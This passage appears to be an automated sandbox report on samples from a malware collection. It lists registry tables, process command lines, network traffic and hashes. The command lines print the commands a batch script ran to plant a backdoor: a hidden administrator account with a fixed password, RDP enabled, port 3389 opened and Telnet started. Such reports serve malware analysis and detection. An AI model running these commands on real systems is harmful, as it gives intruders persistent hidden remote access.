| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Note: the NetSh key is only opened, queried and enumerated, and only by netsh.exe itself; that is how netsh discovers its helper DLLs at startup. No value was written, so this is a side effect of the firewall change made through netsh (see "Modifies Windows Firewall" above), not Netsh helper DLL persistence.
Permission Groups Discovery: Local Groups
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Desktop\New folder\FlashKiller.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New folder\Fantom.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New folder\ac\mssql2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New folder\ac\nc123.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New folder\ac\EVER\SearchHost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\find.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New folder\Dharma.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New folder\Flasher.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\find.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
Note: here and in the next table Fagot.a.exe does not merely read the hardware description; it deletes the CentralProcessor, BIOS, MultifunctionAdapter, FloatingPointProcessor and VideoAdapterBusses keys. The HARDWARE hive is volatile and rebuilt by the kernel at boot, so the damage lasts for the current session, but software that reads CPU or BIOS data from these keys afterwards (the msedge.exe BIOS queries listed below are an example of a legitimate reader) will get nothing back.
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3761892313-3378554128-2287991803-1000\Software\Microsoft\Internet Explorer\Main | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
Modifies Internet Explorer start page
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3761892313-3378554128-2287991803-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "www.blacksnake.com" | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\The-MALWARE-Repo-master.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\ac\EVER\SearchHost.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\ac\mssql2.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\ac\EVER\SearchHost.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffeb0d73cb8,0x7ffeb0d73cc8,0x7ffeb0d73cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1936 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3276 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3632 /prefetch:1
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\JoinDisable.bat
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6060 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5876 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3656 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1704,18050127252598881616,6292619177406847043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4864 /prefetch:8
C:\Windows\System32\DataExchangeHost.exe
C:\Windows\System32\DataExchangeHost.exe -Embedding
C:\Users\Admin\Desktop\New folder\Dharma.exe
"C:\Users\Admin\Desktop\New folder\Dharma.exe"
C:\Users\Admin\Desktop\New folder\ac\nc123.exe
"C:\Users\Admin\Desktop\New folder\ac\nc123.exe"
C:\Users\Admin\Desktop\New folder\ac\mssql.exe
"C:\Users\Admin\Desktop\New folder\ac\mssql.exe"
C:\Users\Admin\Desktop\New folder\ac\mssql2.exe
"C:\Users\Admin\Desktop\New folder\ac\mssql2.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\New folder\ac\Shadow.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\New folder\ac\systembackup.bat" "
C:\Users\Admin\Desktop\New folder\ac\EVER\SearchHost.exe
"C:\Users\Admin\Desktop\New folder\ac\EVER\SearchHost.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
C:\Windows\SysWOW64\Wbem\WMIC.exe
WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
C:\Windows\SysWOW64\find.exe
Find "="
C:\Windows\SysWOW64\net.exe
net user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
C:\Windows\SysWOW64\net.exe
net localgroup Administrators systembackup /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup Administrators systembackup /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
C:\Windows\SysWOW64\Wbem\WMIC.exe
WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
C:\Windows\SysWOW64\find.exe
Find "="
C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" systembackup /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add
C:\Windows\SysWOW64\net.exe
net accounts /forcelogoff:no /maxpwage:unlimited
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f
C:\Windows\SysWOW64\attrib.exe
attrib C:\users\systembackup +r +a +s +h
C:\Windows\SysWOW64\netsh.exe
netsh firewall add portopening TCP 3389 "Remote Desktop"
C:\Windows\SysWOW64\sc.exe
sc config tlntsvr start=auto
C:\Windows\SysWOW64\net.exe
net start Telnet
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start Telnet
C:\Users\Admin\Desktop\New folder\EternalRocks.exe
"C:\Users\Admin\Desktop\New folder\EternalRocks.exe"
C:\Users\Admin\Desktop\New folder\Fagot.a.exe
"C:\Users\Admin\Desktop\New folder\Fagot.a.exe"
C:\Users\Admin\Desktop\New folder\Fantom.exe
"C:\Users\Admin\Desktop\New folder\Fantom.exe"
C:\Users\Admin\Desktop\New folder\Flasher.exe
"C:\Users\Admin\Desktop\New folder\Flasher.exe"
C:\Users\Admin\Desktop\New folder\FlashKiller.exe
"C:\Users\Admin\Desktop\New folder\FlashKiller.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3632 -ip 3632
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 252
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa39d2055 /state1:0x41c64e6d
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.58.20.217.in-addr.arpa | udp |
| US | 185.199.108.133:443 | user-images.githubusercontent.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 20.26.156.216:443 | codeload.github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| N/A | 127.0.0.1:9050 | | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | c4a10f6df4922438ca68ada540730100 |
| SHA1 | 4c7bfbe3e2358a28bf5b024c4be485fa6773629e |
| SHA256 | f286c908fea67163f02532503b5555a939f894c6f2e683d80679b7e5726a7c02 |
| SHA512 | b4d407341989e0bbbe0cdd64f7757bea17f0141a89104301dd7ffe45e7511d3ea27c53306381a29c24df68bdb9677eb8c07d4d88874d86aba41bb6f0ce7a942c |
\??\pipe\LOCAL\crashpad_1640_RFFVFYFQOMVLDGMG
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 4c3889d3f0d2246f800c495aec7c3f7c |
